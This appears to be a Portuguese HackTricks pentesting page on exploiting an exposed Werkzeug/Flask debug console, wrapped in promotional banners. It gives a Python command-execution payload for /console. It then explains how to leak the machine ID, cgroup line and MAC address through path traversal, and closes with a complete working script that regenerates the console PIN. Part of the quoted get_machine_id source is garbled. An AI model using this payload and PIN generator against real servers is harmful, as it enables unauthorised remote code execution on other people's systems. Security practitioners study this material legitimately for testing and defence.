9.9 KiB
Werkzeug / Flask Debug
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.
DragonJAR Security Conference é um evento internacional de cibersegurança com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento de alto conteúdo técnico onde são apresentadas as últimas pesquisas em espanhol que atraem hackers e pesquisadores de todo o mundo.
Registre-se agora no seguinte link e não perca esta grande conferência!:
{% embed url="https://www.dragonjarcon.org" %}
Console RCE
Se o modo de depuração estiver ativo, você pode tentar acessar /console
e obter RCE.
__import__('os').popen('whoami').read();
Também existem várias explorações na internet como esta ou uma no metasploit.
Protegido por PIN - Traversal de Caminho
Em algumas ocasiões, o endpoint /console
será protegido por um PIN. Se você tiver uma vulnerabilidade de travessia de arquivo, poderá vazar todas as informações necessárias para gerar esse PIN.
Exploração de PIN do Werkzeug Console
Copiado do primeiro link.
Veja a mensagem "console bloqueado" do Werkzeug forçando a página de erro de depuração no aplicativo.
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
Localize a console de depuração vulnerável do Werkzeug no caminho vulnerable-site.com/console
, mas está bloqueada por um número PIN secreto.
Você pode reverter o algoritmo que gera o PIN do console. Inspecte o arquivo __init__.py
de depuração do Werkzeug no servidor, por exemplo, python3.5/site-packages/werkzeug/debug/__init__.py
. Você pode visualizar o repositório de código-fonte do Werkzeug para verificar como o PIN é gerado, mas é melhor vazar o código-fonte por meio de uma vulnerabilidade de travessia de arquivos, já que as versões provavelmente são diferentes.
Variáveis necessárias para explorar o PIN do console:
probably_public_bits = [
username,
modname,
getattr(app, '__name__', getattr(app.__class__, '__name__')),
getattr(mod, '__file__', None),
]
private_bits = [
str(uuid.getnode()),
get_machine_id(),
]
probably_public_bits
username
é o usuário que iniciou este Flaskmodname
é flask.appgetattr(app, '__name__', getattr (app .__ class__, '__name__'))
é Flaskgetattr(mod, '__file__', None)
é o caminho absoluto deapp.py
no diretório do flask (por exemplo,/usr/local/lib/python3.5/dist-packages/flask/app.py
). Seapp.py
não funcionar, tenteapp.pyc
private_bits
-
uuid.getnode()
é o endereço MAC do computador atual,str(uuid.getnode())
é a expressão decimal do endereço MAC. -
Para encontrar o endereço MAC do servidor, é necessário saber qual interface de rede está sendo usada para servir o aplicativo (por exemplo,
ens3
). Se desconhecido, vaze/proc/net/arp
para obter o ID do dispositivo e, em seguida, vaze o endereço MAC em/sys/class/net/<device id>/address
.
Converter de endereço hex para decimal executando em python, por exemplo:
# Era 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
get_machine_id()
concatena os valores em/etc/machine-id
ou/proc/sys/kernel/random/boot_id
com a primeira linha de/proc/self/cgroup
após a última barra (/
).
Código get_machine_id()
```python def get_machine_id() -> t.Optional[t.Union[str, bytes]]: global _machine_idif _machine_id is not None: return _machine_id
def _generate() -> t.Optional[t.Union[str, bytes]]: linux = b""
machine-id is stable across boots, boot_id is not.
for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": try: with open(filename, "rb") as f: value = f.readline().strip() except OSError: continue
if value: linux += value break
Containers share the same machine id, add some cgroup
information. This is used outside containers too but should be
relatively stable across boots.
try: with open("/proc/self/cgroup", "rb") as f: linux += f.readline().strip().rpartition(b"/")[2] except OSError: pass
if linux: return linux
On OS X, use ioreg to get the computer's serial number.
try:
</details>
Uma vez que todas as variáveis estiverem preparadas, execute o script de exploração para gerar o PIN do console Werkzeug:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]
#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
{% hint style="success" %} Se você estiver em uma versão antiga do Werkzeug, tente alterar o algoritmo de hash para md5 em vez de sha1. {% endhint %}
Referências
DragonJAR Security Conference é um evento internacional de cibersegurança com mais de uma década que será realizado nos dias 7 e 8 de setembro de 2023 em Bogotá, Colômbia. É um evento com conteúdo técnico de alta qualidade, onde são apresentadas as últimas pesquisas em espanhol, atraindo hackers e pesquisadores de todo o mundo.
Registre-se agora no seguinte link e não perca esta grande conferência!:
{% embed url="https://www.dragonjarcon.org" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Você quer ver sua empresa anunciada no HackTricks? Ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra The PEASS Family, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.